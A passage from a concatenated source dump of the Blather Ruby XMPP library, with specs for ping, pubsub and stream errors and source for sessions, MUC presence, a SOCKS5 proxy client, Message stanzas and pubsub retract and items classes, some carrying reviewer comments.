    expect(iq.xpath('ns:ping', :ns => 'urn:xmpp:ping')).not_to be_empty
  end

  it 'responds with an empty IQ' do
    # BUG FIX: the request id was a redaction placeholder ('<PASSWORD>')
    # while the expected pong used 'abc123'; a reply keeps the request's
    # id, so the equality assertion requires both to share 'abc123'.
    # NOTE(review): the to/from values still look like redacted
    # placeholders ('<EMAIL>') -- restore the original JIDs if needed.
    ping = Blather::Stanza::Iq::Ping.new :get, '<EMAIL>', 'abc123'
    ping.from = '<EMAIL>'
    expected_pong = Blather::Stanza::Iq::Ping.new(:result, '<EMAIL>', 'abc123').tap do |pong|
      pong.from = '<EMAIL>'
    end
    reply = ping.reply
    expect(reply).to eq(expected_pong)
    expect(reply.children.count).to eq(0)
  end
end
<file_sep>/lib/blather/stream/features/session.rb
module Blather
class Stream
# @private
class Session < Features
  SESSION_NS = 'urn:ietf:params:xml:ns:xmpp-session'.freeze
  register SESSION_NS

  def initialize(stream, succeed, fail)
    super
    @to = @stream.jid.domain
  end

  # Dispatch on the incoming element: a <session/> feature announcement
  # triggers the session request; an <iq/> is the server's answer;
  # anything else is an unknown response.
  def receive_data(stanza)
    @node = stanza
    name = stanza.element_name
    if name == 'session'
      session
    elsif name == 'iq'
      check_response
    else
      fail!(UnknownResponse.new(stanza))
    end
  end

private

  # Succeed when the server answered with an IQ result; otherwise surface
  # the stanza error.
  def check_response
    return succeed! if @node[:type] == 'result'
    fail!(StanzaError.import(@node))
  end

  ##
  # Send the session-establishment IQ to the server's domain
  def session
    request = Stanza::Iq.new :set
    request.to = @to
    request << (sess = XMPPNode.new('session', request.document))
    sess.namespace = SESSION_NS
    @stream.send request
  end
end
end
end
<file_sep>/spec/blather/stanza/pubsub/create_spec.rb
require 'spec_helper'
require 'fixtures/pubsub'
describe Blather::Stanza::PubSub::Create do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:create, 'http://jabber.org/protocol/pubsub')).to eq(Blather::Stanza::PubSub::Create)
end
it 'can be imported' do
expect(Blather::XMPPNode.parse(<<-NODE)).to be_instance_of Blather::Stanza::PubSub::Create
<iq type='set'
from='<EMAIL>/elsinore'
to='pubsub.shakespeare.lit'
id='create1'>
<pubsub xmlns='http://jabber.org/protocol/pubsub'>
<create node='princely_musings'/>
<configure/>
</pubsub>
</iq>
NODE
end
it 'ensures a create node is present on create' do
create = Blather::Stanza::PubSub::Create.new
expect(create.find('//ns:pubsub/ns:create', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
it 'ensures a configure node is present on create' do
create = Blather::Stanza::PubSub::Create.new
expect(create.find('//ns:pubsub/ns:configure', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
it 'ensures a create node exists when calling #create_node' do
create = Blather::Stanza::PubSub::Create.new
create.pubsub.remove_children :create
expect(create.find('//ns:pubsub/ns:create', :ns => Blather::Stanza::PubSub.registered_ns)).to be_empty
expect(create.create_node).not_to be_nil
expect(create.find('//ns:pubsub/ns:create', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
it 'defaults to a set node' do
create = Blather::Stanza::PubSub::Create.new
expect(create.type).to eq(:set)
end
it 'sets the host if requested' do
create = Blather::Stanza::PubSub::Create.new :set, 'pubsub.jabber.local'
expect(create.to).to eq(Blather::JID.new('pubsub.jabber.local'))
end
it 'sets the node' do
create = Blather::Stanza::PubSub::Create.new :set, 'host', 'node-name'
expect(create.node).to eq('node-name')
end
end
<file_sep>/spec/blather/stanza/pubsub/event_spec.rb
require 'spec_helper'
require 'fixtures/pubsub'
# Specs for XEP-0060 pubsub event notifications (items, retractions,
# purges and subscription notifications carried in <message/> stanzas).
describe Blather::Stanza::PubSub::Event do
  it 'registers itself' do
    expect(Blather::XMPPNode.class_from_registration(:event, 'http://jabber.org/protocol/pubsub#event')).to eq(Blather::Stanza::PubSub::Event)
  end

  it 'is importable' do
    expect(Blather::XMPPNode.parse(event_notification_xml)).to be_instance_of Blather::Stanza::PubSub::Event
  end

  it 'ensures a query node is present on create' do
    evt = Blather::Stanza::PubSub::Event.new
    expect(evt.find('ns:event', :ns => Blather::Stanza::PubSub::Event.registered_ns)).not_to be_empty
  end

  it 'ensures an event node exists when calling #event_node' do
    evt = Blather::Stanza::PubSub::Event.new
    evt.remove_children :event
    expect(evt.find('*[local-name()="event"]')).to be_empty
    # Accessing #event_node should lazily recreate the removed child
    expect(evt.event_node).not_to be_nil
    expect(evt.find('ns:event', :ns => Blather::Stanza::PubSub::Event.registered_ns)).not_to be_empty
  end

  it 'ensures an items node exists when calling #items_node' do
    evt = Blather::Stanza::PubSub::Event.new
    evt.remove_children :items
    expect(evt.find('*[local-name()="items"]')).to be_empty
    expect(evt.items_node).not_to be_nil
    expect(evt.find('ns:event/ns:items', :ns => Blather::Stanza::PubSub::Event.registered_ns)).not_to be_empty
  end

  it 'knows the associated node name' do
    evt = Blather::XMPPNode.parse(event_with_payload_xml)
    expect(evt.node).to eq('princely_musings')
  end

  it 'ensures newly inherited items are PubSubItem objects' do
    evt = Blather::XMPPNode.parse(event_with_payload_xml)
    expect(evt.items?).to eq(true)
    expect(evt.retractions?).to eq(false)
    expect(evt.items.map { |i| i.class }.uniq).to eq([Blather::Stanza::PubSub::PubSubItem])
  end

  it 'will iterate over each item' do
    evt = Blather::XMPPNode.parse(event_with_payload_xml)
    evt.items.each { |i| expect(i.class).to eq(Blather::Stanza::PubSub::PubSubItem) }
  end

  it 'handles receiving subscription ids' do
    evt = Blather::XMPPNode.parse(event_subids_xml)
    expect(evt.subscription_ids).to eq(['123-abc', '004-yyy'])
  end

  it 'can have a list of retractions' do
    evt = Blather::XMPPNode.parse(<<-NODE)
<message from='pubsub.shakespeare.lit' to='<EMAIL>' id='foo'>
<event xmlns='http://jabber.org/protocol/pubsub#event'>
<items node='princely_musings'>
<retract id='ae890ac52d0df67ed7cfdf51b644e901'/>
</items>
</event>
</message>
    NODE
    expect(evt.retractions?).to eq(true)
    expect(evt.items?).to eq(false)
    expect(evt.retractions).to eq(%w[ae890ac52d0df67ed7cfdf51b644e901])
  end

  it 'can be a purge' do
    evt = Blather::XMPPNode.parse(<<-NODE)
<message from='pubsub.shakespeare.lit' to='<EMAIL>' id='foo'>
<event xmlns='http://jabber.org/protocol/pubsub#event'>
<purge node='princely_musings'/>
</event>
</message>
    NODE
    expect(evt.purge?).not_to be_nil
    expect(evt.node).to eq('princely_musings')
  end

  it 'can be a subscription notification' do
    evt = Blather::XMPPNode.parse(<<-NODE)
<message from='pubsub.shakespeare.lit' to='<EMAIL>' id='foo'>
<event xmlns='http://jabber.org/protocol/pubsub#event'>
<subscription jid='<EMAIL>' subscription='subscribed' node='/example.com/test'/>
</event>
</message>
    NODE
    expect(evt.subscription?).not_to be_nil
    expect(evt.subscription[:jid]).to eq('<EMAIL>')
    expect(evt.subscription[:subscription]).to eq('subscribed')
    expect(evt.subscription[:node]).to eq('/example.com/test')
  end
end
<file_sep>/lib/blather/stanza/presence/muc.rb
module Blather
  class Stanza
    class Presence
      # Presence stanza used when joining Multi-User Chat rooms (XEP-0045).
      # Carries an <x xmlns='http://jabber.org/protocol/muc'/> child element.
      class MUC < Status
        register :muc_join, :x, "http://jabber.org/protocol/muc"

        # Ensure newly created stanzas always carry the muc <x/> child
        def self.new(*args)
          new_node = super
          new_node.muc
          new_node
        end

        module InstanceMethods
          # Remove our own <x/> child before inheriting so the inherited
          # node's muc element (if present) is not duplicated
          def inherit(node)
            muc.remove
            super
            self
          end

          # Get or create the muc <x/> child element
          #
          # NOTE(review): the lookup uses MUC.registered_ns while creation
          # uses self.class.registered_ns -- for a subclass registered under
          # a different namespace these could disagree; confirm intended.
          #
          # @return [Blather::XMPPNode]
          def muc
            unless muc = find_first('ns:x', :ns => MUC.registered_ns)
              self << (muc = XMPPNode.new('x', self.document))
              muc.namespace = self.class.registered_ns
            end
            muc
          end
        end

        include InstanceMethods
      end # MUC
    end # Presence
  end # Stanza
end # Blather
<file_sep>/lib/blather/core_ext/eventmachine.rb
# @private
# @private
module EventMachine
  # @private
  module Protocols
    # Basic SOCKS v5 client implementation (RFC 1928, no authentication)
    #
    # Use as you would any regular connection:
    #
    #   class MyConn < EM::P::Socks5
    #     def post_init
    #       send_data("sup")
    #     end
    #
    #     def receive_data(data)
    #       send_data("you said: #{data}")
    #     end
    #   end
    #
    #   EM.connect socks_host, socks_port, MyConn, host, port
    #
    # @private
    class Socks5 < Connection
      # @param [String] host destination host to tunnel to (IPv4, IPv6 or domain)
      # @param [Integer] port destination port to tunnel to
      def initialize(host, port)
        @host = host
        @port = port
        @socks_error_code = nil
        @buffer = ''
        @socks_state = :method_negotiation
        @socks_methods = [0] # TODO: other authentication methods
        setup_methods
      end

      # Shadow the subclass's post_init/receive_data with singleton methods
      # that drive the SOCKS handshake until the tunnel is established.
      def setup_methods
        class << self
          def post_init; socks_post_init; end
          def receive_data(*a); socks_receive_data(*a); end
        end
      end

      # Remove the singleton overrides so the subclass's own
      # post_init/receive_data take effect again.
      def restore_methods
        class << self
          remove_method :post_init
          remove_method :receive_data
        end
      end

      # Send the SOCKS5 greeting: version byte, method count, method codes
      def socks_post_init
        packet = [5, @socks_methods.size].pack('CC') + @socks_methods.pack('C*')
        send_data(packet)
      end

      # Drive the SOCKS5 handshake state machine:
      # :method_negotiation -> :connecting -> :connected (or :invalid on error).
      def socks_receive_data(data)
        @buffer << data
        if @socks_state == :method_negotiation
          # Server reply: version byte + chosen auth method byte
          return if @buffer.size < 2
          header_resp = @buffer.slice! 0, 2
          _, method_code = header_resp.unpack("cc")
          if @socks_methods.include?(method_code)
            @socks_state = :connecting
            # CONNECT request header: VER=5, CMD=1 (connect), RSV=0
            packet = [5, 1, 0].pack("C*")
            if @host =~ /^(\d+)\.(\d+)\.(\d+)\.(\d+)$/ # IPv4
              packet << [1, $1.to_i, $2.to_i, $3.to_i, $4.to_i].pack("C*")
            elsif @host.include?(":") # IPv6
              # Expand a possibly '::'-compressed address into 8 hex groups
              l, r = if @host =~ /^(.*)::(.*)$/
                [$1,$2].map {|i| i.split ":"}
              else
                [@host.split(":"),[]]
              end
              dec_groups = (l + Array.new(8-l.size-r.size, '0') + r).map {|i| i.hex}
              packet << ([4] + dec_groups).pack("Cn8")
            else # Domain
              packet << [3, @host.length, @host].pack("CCA*")
            end
            packet << [@port].pack("n")
            send_data packet
          else
            # Server accepted none of our auth methods
            @socks_state = :invalid
            @socks_error_code = method_code
            close_connection
            return
          end
        elsif @socks_state == :connecting
          # Reply header: VER, REP (0 = success), RSV, ATYP
          return if @buffer.size < 4
          header_resp = @buffer.slice! 0, 4
          _, response_code, _, address_type = header_resp.unpack("C*")
          if response_code == 0
            # Strip the server-bound address; its length depends on ATYP.
            # NOTE(review): this assumes the address/port bytes arrived in
            # the same packet as the header -- a fragmented reply could
            # leave these slices short; confirm against real servers.
            case address_type
            when 1
              @buffer.slice! 0, 4
            when 3
              len = @buffer.slice! 0, 1
              @buffer.slice! 0, len.unpack("C").first
            when 4
              @buffer.slice! 0, 16
            else
              @socks_state = :invalid
              @socks_error_code = address_type
              close_connection
              return
            end
            @buffer.slice! 0, 2 # bound port (2 bytes)
            @socks_state = :connected
            restore_methods
            # Hand control back to the subclass and replay any buffered data
            post_init
            receive_data(@buffer) unless @buffer.empty?
          else
            @socks_state = :invalid
            @socks_error_code = response_code
            close_connection
            return
          end
        end
      end
    end
  end
end
<file_sep>/spec/blather/errors/stream_error_spec.rb
require 'spec_helper'
# Build a stream-level <error/> fixture (RFC 6120 sec. 4.9) containing the
# given defined condition, an optional <text/> child, and an application
# extension element in the 'blather:stream:error' namespace.
#
# @param [String] error the defined-condition element name (hyphenated)
# @param [String, nil] msg optional human-readable error text
# @return [Blather::XMPPNode] the assembled error node
def stream_error_node(error = 'internal-server-error', msg = nil)
  node = Blather::XMPPNode.new('error')
  node.namespace = {'stream' => Blather::Stream::STREAM_NS}
  node << (err = Blather::XMPPNode.new(error, node.document))
  err.namespace = 'urn:ietf:params:xml:ns:xmpp-streams'
  if msg
    node << (text = Blather::XMPPNode.new('text', node.document))
    text.namespace = 'urn:ietf:params:xml:ns:xmpp-streams'
    text.content = msg
  end
  # Arbitrary application-specific extra element for the extras specs
  node << (extra = Blather::XMPPNode.new('extra-error', node.document))
  extra.namespace = 'blather:stream:error'
  extra.content = 'Blather Error'
  node
end
# Importing a raw stream error node into a StreamError object.
describe 'Blather::StreamError' do
  it 'can import a node' do
    err = stream_error_node 'internal-server-error', 'the message'
    expect(Blather::StreamError).to respond_to :import
    e = Blather::StreamError.import err
    expect(e).to be_kind_of Blather::StreamError
    # Hyphenated condition names become underscored symbols
    expect(e.name).to eq(:internal_server_error)
    expect(e.text).to eq('the message')
    expect(e.extras).to eq(err.find('descendant::*[name()="extra-error"]', 'blather:stream:error').map {|n|n})
  end
end
# Attribute and serialization behaviour of an imported StreamError.
describe 'Blather::StreamError when instantiated' do
  before do
    @err_name = 'internal-server-error'
    @msg = 'the server has experienced a misconfiguration'
    @err = Blather::StreamError.import stream_error_node(@err_name, @msg)
  end

  it 'provides a err_name attribute' do
    expect(@err).to respond_to :name
    expect(@err.name).to eq(@err_name.gsub('-','_').to_sym)
  end

  it 'provides a text attribute' do
    expect(@err).to respond_to :text
    expect(@err.text).to eq(@msg)
  end

  it 'provides an extras attribute' do
    expect(@err).to respond_to :extras
    expect(@err.extras).to be_instance_of Array
    expect(@err.extras.size).to eq(1)
    expect(@err.extras.first.element_name).to eq('extra-error')
  end

  it 'describes itself' do
    # FIXME(review): @type is never assigned in the before block, so
    # /#{@type}/ interpolates to an empty pattern that matches any string --
    # the first and third assertions here are vacuous. Probably @err_name
    # (underscored) was intended.
    expect(@err.to_s).to match(/#{@type}/)
    expect(@err.to_s).to match(/#{@msg}/)
    expect(@err.inspect).to match(/#{@type}/)
    expect(@err.inspect).to match(/#{@msg}/)
  end

  it 'can be turned into xml' do
    expect(@err).to respond_to :to_xml
    doc = parse_stanza @err.to_xml
    expect(doc.xpath("//err_ns:internal-server-error", :err_ns => Blather::StreamError::STREAM_ERR_NS)).not_to be_empty
    expect(doc.xpath("//err_ns:text[.='the server has experienced a misconfiguration']", :err_ns => Blather::StreamError::STREAM_ERR_NS)).not_to be_empty
    expect(doc.xpath("//err_ns:extra-error[.='Blather Error']", :err_ns => 'blather:stream:error')).not_to be_empty
  end
end
# Every defined stream-error condition from RFC 6120 sec. 4.9.3 should
# import with its hyphenated element name mapped to an underscored symbol.
describe 'Each XMPP stream error type' do
  %w[ bad-format
      bad-namespace-prefix
      conflict
      connection-timeout
      host-gone
      host-unknown
      improper-addressing
      internal-server-error
      invalid-from
      invalid-id
      invalid-namespace
      invalid-xml
      not-authorized
      policy-violation
      remote-connection-failed
      resource-constraint
      restricted-xml
      see-other-host
      system-shutdown
      undefined-condition
      unsupported-encoding
      unsupported-stanza-type
      unsupported-version
      xml-not-well-formed
  ].each do |error_type|
    it "handles the name for #{error_type}" do
      e = Blather::StreamError.import stream_error_node(error_type)
      expect(e.name).to eq(error_type.gsub('-','_').to_sym)
    end
  end
end
<file_sep>/lib/blather/stanza/message.rb
module Blather
class Stanza
# # Message Stanza
#
# [RFC 3921 Section 2.1 - Message Syntax](http://xmpp.org/rfcs/rfc3921.html#rfc.section.2.1)
#
# Exchanging messages is a basic use of XMPP and occurs when a user
# generates a message stanza that is addressed to another entity. The
# sender's server is responsible for delivering the message to the intended
# recipient (if the recipient is on the same local server) or for routing
# the message to the recipient's server (if the recipient is on a remote
# server). Thus a message stanza is used to "push" information to another
# entity.
#
# ## "To" Attribute
#
# An instant messaging client specifies an intended recipient for a message
# by providing the JID of an entity other than the sender in the `to`
# attribute of the Message stanza. If the message is being sent outside the
# context of any existing chat session or received message, the value of the
# `to` address SHOULD be of the form "user@domain" rather than of the form
# "user@domain/resource".
#
# msg = Message.new 'user@domain.tld/resource'
# msg.to == 'user@domain.tld/resource'
#
# msg.to = 'another-user@some-domain.tld/resource'
# msg.to == 'another-user@some-domain.tld/resource'
#
# The `to` attribute on a Message stanza works like any regular ruby object
# attribute
#
# ## "Type" Attribute
#
# Common uses of the message stanza in instant messaging applications
# include: single messages; messages sent in the context of a one-to-one
# chat session; messages sent in the context of a multi-user chat room;
# alerts, notifications, or other information to which no reply is expected;
# and errors. These uses are differentiated via the `type` attribute. If
# included, the `type` attribute MUST have one of the following values:
#
# * `:chat` -- The message is sent in the context of a one-to-one chat
# session. Typically a receiving client will present message of type
# `chat` in an interface that enables one-to-one chat between the two
# parties, including an appropriate conversation history.
#
# * `:error` -- The message is generated by an entity that experiences an
# error in processing a message received from another entity. A client
# that receives a message of type `error` SHOULD present an appropriate
# interface informing the sender of the nature of the error.
#
# * `:groupchat` -- The message is sent in the context of a multi-user chat
# environment (similar to that of [IRC]). Typically a receiving client
# will present a message of type `groupchat` in an interface that enables
# many-to-many chat between the parties, including a roster of parties in
# the chatroom and an appropriate conversation history.
#
# * `:headline` -- The message provides an alert, a notification, or other
# information to which no reply is expected (e.g., news headlines, sports
# updates, near-real-time market data, and syndicated content). Because no
# reply to the message is expected, typically a receiving client will
# present a message of type "headline" in an interface that appropriately
# differentiates the message from standalone messages, chat messages, or
# groupchat messages (e.g., by not providing the recipient with the
# ability to reply).
#
# * `:normal` -- The message is a standalone message that is sent outside
# the context of a one-to-one conversation or groupchat, and to which it
# is expected that the recipient will reply. Typically a receiving client
# will present a message of type `normal` in an interface that enables the
# recipient to reply, but without a conversation history. The default
# value of the `type` attribute is `normal`.
#
# Blather provides a helper for each possible type:
#
# Message#chat?
# Message#error?
# Message#groupchat?
# Message#headline?
# Message#normal?
#
# Blather treats the `type` attribute like a normal ruby object attribute
# providing a getter and setter. The default `type` is `chat`.
#
# msg = Message.new
# msg.type # => :chat
# msg.chat? # => true
# msg.type = :normal
# msg.normal? # => true
# msg.chat? # => false
#
# msg.type = :invalid # => RuntimeError
#
#
# ## "Body" Element
#
# The `body` element contains human-readable XML character data that
# specifies the textual contents of the message; this child element is
# normally included but is optional.
#
# Blather provides an attribute-like syntax for Message `body` elements.
#
# msg = Message.new '<EMAIL>', 'message body'
# msg.body # => 'message body'
#
# msg.body = 'other message'
# msg.body # => 'other message'
#
# ## "Subject" Element
#
# The `subject` element contains human-readable XML character data that
# specifies the topic of the message.
#
# Blather provides an attribute-like syntax for Message `subject` elements.
#
# msg = Message.new '<EMAIL>', 'message body'
# msg.subject = 'message subject'
# msg.subject # => 'message subject'
#
# ## "Thread" Element
#
# The primary use of the XMPP `thread` element is to uniquely identify a
# conversation thread or "chat session" between two entities instantiated by
# Message stanzas of type `chat`. However, the XMPP thread element can also
# be used to uniquely identify an analogous thread between two entities
# instantiated by Message stanzas of type `headline` or `normal`, or among
# multiple entities in the context of a multi-user chat room instantiated by
# Message stanzas of type `groupchat`. It MAY also be used for Message
# stanzas not related to a human conversation, such as a game session or an
# interaction between plugins. The `thread` element is not used to identify
# individual messages, only conversations or messaging sessions. The
# inclusion of the `thread` element is optional.
#
# The value of the `thread` element is not human-readable and MUST be
# treated as opaque by entities; no semantic meaning can be derived from it,
# and only exact comparisons can be made against it. The value of the
# `thread` element MUST be a universally unique identifier (UUID) as
# described in [UUID].
#
# The `thread` element MAY possess a 'parent' attribute that identifies
# another thread of which the current thread is an offshoot or child; the
# value of the 'parent' must conform to the syntax of the `thread` element
# itself.
#
# Blather provides an attribute-like syntax for Message `thread` elements.
#
# msg = Message.new
# msg.thread = '12345'
# msg.thread # => '12345'
#
# Parent threads can be set using a hash:
#
# msg.thread = {'parent-id' => 'thread-id'}
# msg.thread # => 'thread-id'
# msg.parent_thread # => 'parent-id'
#
# @handler :message
class Message < Stanza
  # Message types allowed by RFC 3921 sec. 2.1.1
  # @private
  VALID_TYPES = [:chat, :error, :groupchat, :headline, :normal].freeze

  # Chat states defined by XEP-0085
  # @private
  VALID_CHAT_STATES = [:active, :composing, :gone, :inactive, :paused].freeze

  # @private
  CHAT_STATE_NS = 'http://jabber.org/protocol/chatstates'.freeze

  # @private
  HTML_NS = 'http://jabber.org/protocol/xhtml-im'.freeze

  # @private
  HTML_BODY_NS = 'http://www.w3.org/1999/xhtml'.freeze

  register :message

  # Import a parsed <message/> node, delegating to the extension class
  # registered for the first recognized child element (e.g. a pubsub
  # event payload); otherwise builds a plain Message.
  # @private
  def self.import(node)
    klass = nil
    node.children.detect do |e|
      ns = e.namespace ? e.namespace.href : nil
      klass = class_from_registration(e.element_name, ns)
    end
    # The MUC-user <x/> element registers as a Presence class; remap it
    # to the Message flavour so import returns the right stanza type.
    if klass == Blather::Stanza::Presence::MUCUser
      klass = Blather::Stanza::Message::MUCUser
    end
    if klass && klass != self && ![Blather::Stanza::X, Blather::Stanza::Iq].include?(klass)
      klass.import(node)
    else
      new(node[:type]).inherit(node)
    end
  end

  # Create a new Message stanza
  #
  # @param [#to_s] to the JID to send the message to
  # @param [#to_s] body the body of the message
  # @param [Symbol] type the message type. Must be one of VALID_TYPES
  def self.new(to = nil, body = nil, type = :chat)
    node = super :message
    node.to = to
    node.type = type
    node.body = body
    node
  end

  # Overrides the parent method to ensure the current chat state is removed
  #
  # @see Blather::Stanza::Iq#inherit
  def inherit(node)
    xpath('ns:*', :ns => CHAT_STATE_NS).remove
    super
  end

  # Check if the Message is of type :chat
  #
  # @return [true, false]
  def chat?
    self.type == :chat
  end

  # Check if the Message is of type :error
  #
  # @return [true, false]
  def error?
    self.type == :error
  end

  # Check if the Message is of type :groupchat
  #
  # @return [true, false]
  def groupchat?
    self.type == :groupchat
  end

  # Check if the Message is of type :headline
  #
  # @return [true, false]
  def headline?
    self.type == :headline
  end

  # Check if the Message is of type :normal
  #
  # @return [true, false]
  def normal?
    self.type == :normal
  end

  # Ensures type is one of VALID_TYPES
  # (:chat, :error, :groupchat, :headline or :normal)
  #
  # @param [#to_sym] type the Message type. Must be one of VALID_TYPES
  # @raise [ArgumentError] if the type is not valid
  def type=(type)
    if type && !VALID_TYPES.include?(type.to_sym)
      raise ArgumentError, "Invalid Type (#{type}), use: #{VALID_TYPES*' '}"
    end
    super
  end

  # Get the message body
  #
  # @return [String]
  def body
    read_content :body
  end

  # Set the message body
  #
  # @param [#to_s] body the message body
  def body=(body)
    set_content_for :body, body
  end

  # Get the message xhtml node
  # This will create the node if it doesn't exist
  #
  # @return [XML::Node] the <body/> child of the xhtml-im <html/> element
  def xhtml_node
    unless h = find_first('ns:html', :ns => HTML_NS) || find_first('ns:html', :ns => HTML_BODY_NS)
      self << (h = XMPPNode.new('html', self.document))
      h.namespace = HTML_NS
    end
    unless b = h.find_first('ns:body', :ns => HTML_BODY_NS)
      b = XMPPNode.new('body', self.document)
      b.namespace = HTML_BODY_NS
      h << b
    end
    b
  end

  # Get the message xhtml
  #
  # @return [String]
  def xhtml
    self.xhtml_node.inner_html.strip
  end

  # Set the message xhtml
  # This will use Nokogiri to ensure the xhtml is valid
  #
  # @param [#to_s] xhtml_body valid xhtml
  def xhtml=(xhtml_body)
    self.xhtml_node.inner_html = Nokogiri::XML::DocumentFragment.parse(xhtml_body)
  end

  # Get the message subject
  #
  # @return [String]
  def subject
    read_content :subject
  end

  # Set the message subject
  #
  # @param [#to_s] subject the message subject
  def subject=(subject)
    set_content_for :subject, subject
  end

  # Get the message thread
  #
  # @return [String]
  def thread
    read_content :thread
  end

  # Get the parent thread
  #
  # @return [String, nil]
  def parent_thread
    n = find_first('thread')
    n[:parent] if n
  end

  # Set the thread
  #
  # @overload thread=(hash)
  #   Set a thread with a parent
  #   @param [Hash<parent-id => thread-id>] thread
  # @overload thread=(thread)
  #   Set a thread id
  #   @param [#to_s] thread the new thread id
  def thread=(thread)
    # A one-entry Hash {parent => id} carries both ids at once
    parent, thread = thread.to_a.flatten if thread.is_a?(Hash)
    set_content_for :thread, thread
    find_first('thread')[:parent] = parent
  end

  # Returns the message's x:data form child
  def form
    X.find_or_create self
  end

  # Get the message chat state
  #
  # @return [Symbol] one of VALID_CHAT_STATES, or nil when absent/unknown
  def chat_state
    if (elem = find_first('ns:*', :ns => CHAT_STATE_NS)) && VALID_CHAT_STATES.include?(name = elem.name.to_sym)
      name
    end
  end

  # Set the message chat state
  #
  # @param [#to_s] chat_state the message chat state. Must be one of VALID_CHAT_STATES
  # @raise [ArgumentError] if the chat state is not valid
  def chat_state=(chat_state)
    if chat_state && !VALID_CHAT_STATES.include?(chat_state.to_sym)
      raise ArgumentError, "Invalid Chat State (#{chat_state}), use: #{VALID_CHAT_STATES*' '}"
    end
    # Replace (or, when nil, simply clear) any existing chat state element
    xpath('ns:*', :ns => CHAT_STATE_NS).remove
    if chat_state
      state = XMPPNode.new(chat_state, self.document)
      state.namespace = CHAT_STATE_NS
      self << state
    end
  end

  # The XEP-0203 delayed-delivery child, if any
  #
  # @return [Delay, nil]
  def delay
    if d = find_first('ns:delay', :ns => "urn:xmpp:delay")
      Delay.new d
    end
  end

  # @return [true, false] whether a <delay/> element is present
  def delayed?
    !!delay
  end

  # Wrapper for the XEP-0203 <delay/> element
  class Delay < XMPPNode
    # @overload new(node)
    #   Wrap an existing delay node
    #   @param [Nokogiri::XML::Node] stamp the node to inherit
    # @overload new(opts)
    #   @param [Hash] stamp delay options (:stamp, :from, :description)
    # @overload new(stamp, from, description)
    #   @param [#to_s] stamp the delay timestamp
    #   @param [#to_s] from the delaying entity
    #   @param [#to_s] description reason for the delay
    def self.new(stamp = nil, from = nil, description = nil)
      new_node = super :delay
      case stamp
      when Nokogiri::XML::Node
        new_node.inherit stamp
      when Hash
        new_node.stamp = stamp[:stamp]
        new_node.from = stamp[:from]
        new_node.description = stamp[:description]
      else
        new_node.stamp = stamp
        new_node.from = from
        new_node.description = description
      end
      new_node
    end

    # @return [String] the delaying entity's JID string
    def from
      read_attr :from
    end

    # @return [Time, nil] the parsed delay timestamp
    def stamp
      s = read_attr :stamp
      s && Time.parse(s)
    end

    # @return [String] the human-readable delay reason
    def description
      content.strip
    end
  end
end
end
end
<file_sep>/lib/blather/stanza/pubsub/retract.rb
module Blather
  class Stanza
    class PubSub
      # # PubSub Retract Stanza
      #
      # [XEP-0060 Section 7.2 - Delete an Item from a Node](http://xmpp.org/extensions/xep-0060.html#publisher-delete)
      #
      # @handler :pubsub_retract
      class Retract < PubSub
        register :pubsub_retract, :retract, self.registered_ns

        include Enumerable
        alias_method :find, :xpath

        # Create a new Retraction stanza
        #
        # @param [String] host the host to send the request to
        # @param [String] node the node to retract items from
        # @param [Blather::Stanza::Iq::VALID_TYPES] type the IQ stanza type
        # @param [Array<String>] retractions an array of ids to retract
        def self.new(host = nil, node = nil, type = :set, retractions = [])
          stanza = super(type, host)
          stanza.node = node
          stanza.retractions = retractions
          stanza
        end

        # Get the name of the node to retract from
        #
        # @return [String]
        def node
          retract[:node]
        end

        # Set the name of the node to retract from
        #
        # @param [String] node
        def node=(node)
          retract[:node] = node
        end

        # Get or create the actual retract node
        #
        # @return [Blather::XMPPNode]
        def retract
          existing = pubsub.find_first('ns:retract', :ns => self.class.registered_ns)
          return existing if existing
          fresh = XMPPNode.new('retract', self.document)
          self.pubsub << fresh
          fresh.namespace = self.pubsub.namespace
          fresh
        end

        # Set the retraction ids
        #
        # @overload retractions=(id)
        #   @param [String] id an ID to retract
        # @overload retractions=(ids)
        #   @param [Array<String>] ids an array of IDs to retract
        def retractions=(retractions = [])
          [retractions].flatten.each do |item_id|
            self.retract << PubSubItem.new(item_id, nil, self.document)
          end
        end

        # Get the list of item IDs to retract
        #
        # @return [Array<String>]
        def retractions
          retract.find('ns:item', :ns => self.class.registered_ns).map { |item| item[:id] }
        end

        # Iterate over each retraction ID
        #
        # @yieldparam [String] id an ID to retract
        def each(&block)
          retractions.each(&block)
        end

        # The size of the retractions array
        #
        # @return [Fixnum]
        def size
          retractions.length
        end
      end # Retract
    end # PubSub
  end # Stanza
end # Blather
<file_sep>/lib/blather/stanza/pubsub/items.rb
module Blather
  class Stanza
    class PubSub
      # # PubSub Items Stanza
      #
      # [XEP-0060 Section 6.5 - Retrieve Items from a Node](http://xmpp.org/extensions/xep-0060.html#subscriber-retrieve)
      #
      # @handler :pubsub_items
      class Items < PubSub
        register :pubsub_items, :items, self.registered_ns

        include Enumerable
        alias_method :find, :xpath

        # Create a new Items request
        #
        # @param [String] host the pubsub host to send the request to
        # @param [String] path the path of the node
        # @param [Array<String>] list an array of IDs to request
        # @param [#to_s] max the maximum number of items to return
        #
        # @return [Blather::Stanza::PubSub::Items]
        def self.request(host, path, list = [], max = nil)
          node = self.new :get, host
          node.node = path
          node.max_items = max
          (list || []).each do |id|
            node.items_node << PubSubItem.new(id, nil, node.document)
          end
          node
        end

        # Overrides the parent to ensure an items node is created
        # @private
        def self.new(type = nil, host = nil)
          new_node = super
          new_node.items
          new_node
        end

        # Get the node name
        #
        # @return [String]
        def node
          items_node[:node]
        end

        # Set the node name
        #
        # @param [String, nil] node
        def node=(node)
          items_node[:node] = node
        end

        # Get the max number of items requested
        #
        # @return [Fixnum, nil]
        def max_items
          items_node[:max_items].to_i if items_node[:max_items]
        end

        # Set the max number of items requested
        #
        # @param [Fixnum, nil] max_items
        def max_items=(max_items)
          items_node[:max_items] = max_items
        end

        # Iterate over the list of items
        #
        # @yieldparam [Blather::Stanza::PubSub::PubSubItem] item
        def each(&block)
          items.each &block
        end

        # Get the list of items on this stanza
        #
        # @return [Array<Blather::Stanza::PubSub::PubSubItem>]
        def items
          # Wrap every raw <item/> child in a PubSubItem object
          items_node.find('ns:item', :ns => self.class.registered_ns).map do |i|
            PubSubItem.new(nil,nil,self.document).inherit i
          end
        end

        # Get or create the actual items node
        #
        # @return [Blather::XMPPNode]
        def items_node
          unless node = self.pubsub.find_first('ns:items', :ns => self.class.registered_ns)
